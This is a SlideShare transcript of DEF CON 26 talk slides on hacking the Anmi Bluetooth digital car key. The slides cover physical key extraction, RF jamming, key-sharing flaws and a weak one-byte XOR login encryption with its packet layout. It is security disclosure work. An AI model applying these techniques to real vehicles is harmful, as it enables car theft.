Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
GRAND THEFT AUTO
DIGITAL KEY HACKING
@Kevin2600
@MonkeyKing
Agenda:
. Introduction -- Keyfobs 101
. Structure & Functions -- Anmi-Key
. Analysis & Attack vectors -- Anmi-Key
. A0 -- ...
Introduction
. Mechanical Key Entry
. Remote Key Entry (Infrared; Fixed; Rolling)
. Passive Key Entry (Transponder RFID)
. Digital Key ...
New Trend ?
. RKE KeeLoq algorithm cracked (2008)
. Passive Keyless entry Keyfob Relay attack (2012)
. Gone in 60 seconds -- Hijacking...
. Dieter Spaar discovered BMW
ConnectedDrive that allowed him
to remotely open the vehicle’s lock
. Simulated a mobile net...
. Mitsubishi Outlander PHEV
Top Selling hybrid SUV. Control
of the car by WiFi access point
. Unique SSID (REMOTEnnaaaa)
E...
Structure & Functions -- Anmi
Digital Car key -- Anmi
Features
: Keyless Entrance System
: Keyless Engine Start/Stop
: Bluetooth Low Energy 4.0
: Auto Lock/Unlock Function
: Mo...
Components
Key-Pairing
Car-Models
Internal 1
Internal 2
Internal 3
• B T L E - M o d u l e ( C C 2 6 4 0 ) t o
communicate with mobile APP
through 2.4ghz
• RF-Module(NXP-61X0915)...
Mystery Sensor ?
Mystery Sensor ?
RF-Module
Oscillator: 13.560Mhz
Math:
13.560MHz / 8000 = 1695hz
13.560MHz * 32 = 433.92Mhz
SDR-HackRF
SDR-GQRX
BTLE-Module
BTLE-Interactive
BTLE-HCI-log
Mobile APP
Mobile APP - Codes
Mobile APP - Codes
Mobile APP - MitMProxy
Mobile APP - MitMProxy
Mobile APP - Server
Say Bye Bye to your Privacy ..
Encryption ?
Super “Secure” ?
A0 -- Physical access
. Anmi-Key by request, always left in the car
. Breaking glass by force. Get the Anmi-Key
to ulock the door
. Desolder the...
DEMO
A1 -- RF Jamming
RF-Jammer
RF-Jammer
Does Anmi-Key smart enough
to avoid this ?
One way communication ..
DEMO
What's Next
DRIVE IT LIKE YOU HACKED IT
@SamyKamkar
A2 -- Key-Sharing Analysis
Features
Analysis
What could possibly go wrong ?
Key-Sharing-Wechat
Key-Sharing-Wechat
DEMO
Let's cancel it then ?
DEMO
Let's wait until it expired ?
DEMO
A3 -- BTLE Sniffing & Decryption
Where is the “Secure” Encryption ?
BTLE -- Analysis
BTLE -- Analysis
BTLE -- Analysis
BTLE -- 1st Attempt
BTLE -- Login Steps
Login -- Encryption
BTLE -- Login Protocol
Fetch a random values from Anmi-Key (4 bytes)
Calculate EncryptionCode (Random Value; Secret Key)
W...
Only 1 byte key needed
Login -- Encryption
Arg6 is a Dword random
from fetch random
SecretKey is a fixed random
Dword numb...
Login Packet:
+0 byte channel 0xA1
+1 short len fixed in 0301: 43 00
+3 short crc16
+5 short protocolver 0301
+7 byte user...
Recover “EncryptCode” with a fixed year data: 0x12
Then You can get:
Login -- Encryption
Login – Crafting Packets
Login – Crafting Packets
Error Code 0x66 ???
Login – Firmware Inspection
Flag[1] is set only when Anmi-Key
is fully assembled
Login – Crafting Packets
Login -- Sniffing Packets
Login -- Sniffing Packets
Login -- Encryption
. 1-byte of encryption key
. XOR as the super secure
encryption algorithm
. Easy to recover by sniffin...
DEMO
Report for CVE ?
Conclusion:
. Security by obscurity !?
. Don’t trust the user input
. New trends come with new hacks
. Test the product pr...
Question ?
Grand theft-auto-digital-key-hacking
Grand theft-auto-digital-key-hacking
You’ve finished this document.
Download and read it offline.
Upcoming SlideShare
What to Upload to SlideShare
Next
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

Share

Grand theft-auto-digital-key-hacking

Download to read offline

DEFCON26 talk slides -- Please find demo videos at my Youtube channel: https://www.youtube.com/user/ReverseKevin/videos

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all
  • Be the first to like this

Grand theft-auto-digital-key-hacking

  1. 1. GRAND THEFT AUTO DIGITAL KEY HACKING @Kevin2600 @MonkeyKing
  2. 2. Agenda: . Introduction -- Keyfobs 101 . Structure & Functions -- Anmi-Key . Analysis & Attack vectors -- Anmi-Key . A0 -- Physical Access . A1 -- RF Jamming Attack . A2 -- Key-Sharing Analysis . A3 -- BTLE Sniffing & Decryption
  3. 3. Introduction
  4. 4. . Mechanical Key Entry . Remote Key Entry (Infrared; Fixed; Rolling) . Passive Key Entry (Transponder RFID) . Digital Key Entry (Mobile phone as Key) Car-Keyfobs
  5. 5. New Trend ?
  6. 6. . RKE KeeLoq algorithm cracked (2008) . Passive Keyless entry Keyfob Relay attack (2012) . Gone in 60 seconds -- Hijacking with Hitag2 (2012) . Samy's Rolljam -- Drive it like you hacked it (2015) . BMW ConnectedDrive -- Telematics hacked (2015) . Mitsubishi Outlander WIFI Hacked -- PenTestPartners (2016) . 14 vulnerabilities found in BMW connected cars -- KeenLab (2018) What Hacked ?
  7. 7. . Dieter Spaar discovered BMW ConnectedDrive that allowed him to remotely open the vehicle’s lock . Simulated a mobile network in a test environment with OpenBSC . After triggered by a decrypted SMS message. The vehicle sent a simple HTTP GET request to the server, in order to retrieve unlock command New trend New hack - 2015 http://tiny.cc/bmwconnectedrive
  8. 8. . Mitsubishi Outlander PHEV Top Selling hybrid SUV. Control of the car by WiFi access point . Unique SSID (REMOTEnnaaaa) Easy to locate on wigle.net. The Wi-Fi PSK is too short to crack .Controlling protocols are reverse engineered. Turn on/off Air-condition; Heating; Lights and Alarm !!! New trend New hack - 2016 http://tiny.cc/pentestpartners-Outlander
  9. 9. Structure & Functions -- Anmi
  10. 10. Digital Car key -- Anmi
  11. 11. Features : Keyless Entrance System : Keyless Engine Start/Stop : Bluetooth Low Energy 4.0 : Auto Lock/Unlock Function : Mobile as Key (Android; Iphone) : Remote Keys Sharing (20 Users)
  12. 12. Components
  13. 13. Key-Pairing
  14. 14. Car-Models
  15. 15. Internal 1
  16. 16. Internal 2
  17. 17. Internal 3 • B T L E - M o d u l e ( C C 2 6 4 0 ) t o communicate with mobile APP through 2.4ghz • RF-Module(NXP-61X0915) Emits unlock/lock cmd to the vehicle. RF-module vary from different car models • BTLE-Module (SYD8801) sensor. 2.4GHz BTLE SOC 32-bit ARM Cortex-M0. Functionality unknown ?
  18. 18. Mystery Sensor ?
  19. 19. Mystery Sensor ?
  20. 20. RF-Module Oscillator: 13.560Mhz Math: 13.560MHz / 8000 = 1695hz 13.560MHz * 32 = 433.92Mhz
  21. 21. SDR-HackRF
  22. 22. SDR-GQRX
  23. 23. BTLE-Module
  24. 24. BTLE-Interactive
  25. 25. BTLE-HCI-log
  26. 26. Mobile APP
  27. 27. Mobile APP - Codes
  28. 28. Mobile APP - Codes
  29. 29. Mobile APP - MitMProxy
  30. 30. Mobile APP - MitMProxy
  31. 31. Mobile APP - Server Say Bye Bye to your Privacy ..
  32. 32. Encryption ?
  33. 33. Super “Secure” ?
  34. 34. A0 -- Physical access
  35. 35. . Anmi-Key by request, always left in the car . Breaking glass by force. Get the Anmi-Key to ulock the door . Desolder the Registered Anmi chip and Mechanical Key put it into a blank key . Or use self design board to emits unlock cmd to the vehicle by RF-module . Start the engine and run away Old School way
  36. 36. DEMO
  37. 37. A1 -- RF Jamming
  38. 38. RF-Jammer
  39. 39. RF-Jammer
  40. 40. Does Anmi-Key smart enough to avoid this ?
  41. 41. One way communication ..
  42. 42. DEMO
  43. 43. What's Next DRIVE IT LIKE YOU HACKED IT @SamyKamkar
  44. 44. A2 -- Key-Sharing Analysis
  45. 45. Features
  46. 46. Analysis
  47. 47. What could possibly go wrong ?
  48. 48. Key-Sharing-Wechat
  49. 49. Key-Sharing-Wechat
  50. 50. DEMO
  51. 51. Let's cancel it then ?
  52. 52. DEMO
  53. 53. Let's wait until it expired ?
  54. 54. DEMO
  55. 55. A3 -- BTLE Sniffing & Decryption
  56. 56. Where is the “Secure” Encryption ?
  57. 57. BTLE -- Analysis
  58. 58. BTLE -- Analysis
  59. 59. BTLE -- Analysis
  60. 60. BTLE -- 1st Attempt
  61. 61. BTLE -- Login Steps
  62. 62. Login -- Encryption
  63. 63. BTLE -- Login Protocol Fetch a random values from Anmi-Key (4 bytes) Calculate EncryptionCode (Random Value; Secret Key) Wrap up to make an encrypted login packets Send to Anmi-Key and Log in (Status 0xAA)
  64. 64. Only 1 byte key needed Login -- Encryption Arg6 is a Dword random from fetch random SecretKey is a fixed random Dword number from device Initialization
  65. 65. Login Packet: +0 byte channel 0xA1 +1 short len fixed in 0301: 43 00 +3 short crc16 +5 short protocolver 0301 +7 byte usertype +8 uchar[16] password +24 uchar[16] enc_md5_username +40 uchar[16] enc_md5_imei +56 uchar[6] enc_advertising_key //ascii +62 uchar[6] enc_date // YYMMDDHHMMSS +68 uchar enc_openrssi +69 uchar enc_lockRssi What we need is to decrypt only 1 byte Login -- Encryption What year now ?
  66. 66. Recover “EncryptCode” with a fixed year data: 0x12 Then You can get: Login -- Encryption
  67. 67. Login – Crafting Packets
  68. 68. Login – Crafting Packets Error Code 0x66 ???
  69. 69. Login – Firmware Inspection Flag[1] is set only when Anmi-Key is fully assembled
  70. 70. Login – Crafting Packets
  71. 71. Login -- Sniffing Packets
  72. 72. Login -- Sniffing Packets
  73. 73. Login -- Encryption . 1-byte of encryption key . XOR as the super secure encryption algorithm . Easy to recover by sniffing the BTLE packets
  74. 74. DEMO
  75. 75. Report for CVE ?
  76. 76. Conclusion: . Security by obscurity !? . Don’t trust the user input . New trends come with new hacks . Test the product properly, before going on market
  77. 77. Question ?

DEFCON26 talk slides -- Please find demo videos at my Youtube channel: https://www.youtube.com/user/ReverseKevin/videos

Views

Total views

2,011

On Slideshare

0

From embeds

0

Number of embeds

188

Actions

Downloads

34

Shares

0

Comments

0

Likes

0

×